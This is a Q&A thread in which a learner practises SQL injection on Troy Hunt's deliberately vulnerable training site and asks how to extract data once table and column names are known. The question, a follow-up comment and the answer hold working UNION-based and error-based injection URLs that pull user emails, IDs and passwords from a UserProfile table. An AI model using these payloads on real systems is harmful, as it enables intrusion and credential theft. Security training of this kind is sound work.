# How to extract data from hackyourself legal site with table and column information?

Tags: sql-injection, injection, sql-server

I am following the Pluralsight SQL injection tutorial. The instructor did not go over actually extracting the data.

```
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'AND 1=(SELECT TOP 1 name from (SELECT top 1 name from sys.tables order by name) t order by name desc)--
```

[image: User profile table with columns]

I tried running injections like:

```
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'union select Email FROM UserProfile--

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'union select top 1 Email FROM UserProfile--
```

I get this error:

All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

So I thought oh that's right the columns need to match the query Cylinders=V12. I believe that would be one or two. So I changed my query to:

```
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' UNION SELECT Email, FirstName FROM UserProfile;
```

I get this error:

Cannot resolve the collation conflict between "Latin1_General_CI_AS" and "SQL_Latin1_General_CP1_CI_AS" in the UNION operation.

How would I go about extracting data when I have table and column information?

Comment: http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12%27%20UNION%20SELECT%20UserID,%20%27Password%27%20FROM%20UserProfile%20WHERE%20Email=%27ski@gmail.com%27--      I did this and got 44 which I believe is ski@gmail.com ID. How would I get the password?

Answer (score 1):

```
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' AND 1=(select top 1 password from UserProfile where UserId=(select top 1 UserId from(select top 1 UserId from userprofile order by UserId) sq order by UserId DESC))--
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' AND 1=(select top 1 Email from UserProfile where UserId=(select top 1 UserId from(select top 1 UserId from userprofile order by UserId) sq order by UserId DESC))--
```

I found the solution. Now I KNOW what error-based SQL Injection really is.